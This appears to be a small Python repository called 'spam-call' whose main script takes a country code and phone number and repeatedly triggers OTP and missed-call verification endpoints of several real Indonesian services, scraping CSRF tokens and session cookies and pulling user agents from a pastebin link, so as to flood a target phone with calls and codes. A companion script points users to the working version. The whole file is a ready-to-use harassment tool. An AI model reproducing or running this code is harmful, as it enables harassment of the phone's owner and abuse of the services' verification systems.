├── README.md ├── call-1.py └── call.py /README.md: -------------------------------------------------------------------------------- 1 | # spam-call 2 | Script Spam Call 3 | -------------------------------------------------------------------------------- /call-1.py: -------------------------------------------------------------------------------- 1 | import os,sys,time,requests,random,json,re 2 | from time import sleep 3 | os.system('clear') 4 | class kntl(): 5 | def __init__(self): 6 | self.ua=requests.get('https://pastebin.com/raw/zkCXTGcm').text.split('\n') 7 | self.acak = random.choice(self.ua) 8 | self.hh=input('\033[00mCountry Code: \033[96m') 9 | self.number=input('\033[00mPhone Number: \033[96m') 10 | self.gb=self.hh+self.number 11 | self.smp() 12 | time.sleep(3) 13 | def smp(self): 14 | self.hd={ 15 | 'Domain-Name': 'stg', 16 | 'Content-Type': 'application/json; charset=UTF-8', 17 | 'Host': 'srv3.sampingan.co.id', 18 | 'Connection': 'Keep-Alive', 19 | 'Accept-Encoding': 'gzip', 20 | 'User-Agent': '{self.acak}'} 21 | self.dat1=json.dumps({"countryCode":self.hh,"phoneNumber":self.number}) 22 | r2=requests.post('https://srv3.sampingan.co.id/auth/check-auth-state', data=self.dat1, headers=self.hd) 23 | r3=requests.post('https://srv3.sampingan.co.id/auth/generate-otp?is_register=true', data=self.dat1, headers=self.hd) 24 | self.ssh() 25 | def ssh(self): 26 | r=requests.get('https://www.citcall.com/demo/') 27 | ck=r.cookies['PHPSESSID'] 28 | w=r.text 29 | j=re.findall(r"name=\"csrf_token\" id=\"csrf_token\" value=\"(.*?)\"", w)[0] 30 | ua={ 31 | 'Host': 'www.citcall.com', 32 | 'cache-control': 'max-age=0', 33 | 'origin': 'https://www.citcall.com', 34 | 'upgrade-insecure-requests': '1', 35 | 'content-type': 'application/x-www-form-urlencoded', 36 | 'user-agent': '{self.acak}', 37 | 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 38 | 'referer': 'https://www.citcall.com/demo/', 39 | 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 40 | 'cookie': f'PHPSESSID={ck}'} 41 | dt={'cellNo':self.gb,'csrf_token':j} 42 | r1=requests.post('https://www.citcall.com/demo/verification.php', data=dt, headers=ua) 43 | dt1={'cid':self.gb,'trying':'0','csrf_token':j} 44 | r2=requests.post('https://www.citcall.com/demo/misscallapi.php', data=dt1, headers=ua) 45 | self.sss() 46 | def sss(self): 47 | time.sleep(5) 48 | r=requests.get('https://id.jagreward.com/member/register/').cookies['PHPSESSID'] 49 | ua={ 50 | 'Host': 'id.jagreward.com', 51 | 'Connection': 'keep-alive', 52 | 'Accept': '*/*', 53 | 'X-Requested-With': 'XMLHttpRequest', 54 | 'User-Agent': '{self.acak}', 55 | 'Referer': 'https://id.jagreward.com/member/register/', 56 | 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 57 | 'Cookie': f'PHPSESSID={r}'} 58 | rq=requests.get(f'https://id.jagreward.com/member/verify-mobile/{self.number}/', headers=ua).text 59 | try: 60 | print("\033[00m\t<\033[91m/\033[00m>\033[93mSpam Call\033[00m<\033[91m/\033[00m>\n\033[00m\t\033[41;1m FahmiApz \033[00m") 61 | kntl() 62 | print('\n\033[00mDone.') 63 | while True: 64 | cb=input('\033[00mTry again?(y/t):') 65 | if cb == 'y': 66 | os.system('python call-1.py') 67 | elif cb == 't': 68 | sys.exit() 69 | else: 70 | print('\033[00mWrong Input!') 71 | except KeyError: 72 | sys.exit('Error!') 73 | except KeyboardInterrupt: 74 | sys.exit('Stop!') 75 | 76 | -------------------------------------------------------------------------------- /call.py: -------------------------------------------------------------------------------- 1 | import os,sys,time 2 | def kata(s): 3 | for c in s + '\n': 4 | sys.stdout.write(c) 5 | sys.stdout.flush() 6 | time.sleep(1./12) 7 | kata('''\033[91m[!]\033[00mScript Sudah Koid 8 | Silahkan Update Ketikan: git pull jika sudah 9 | Ketikan: python call-1.py''') 10 | --------------------------------------------------------------------------------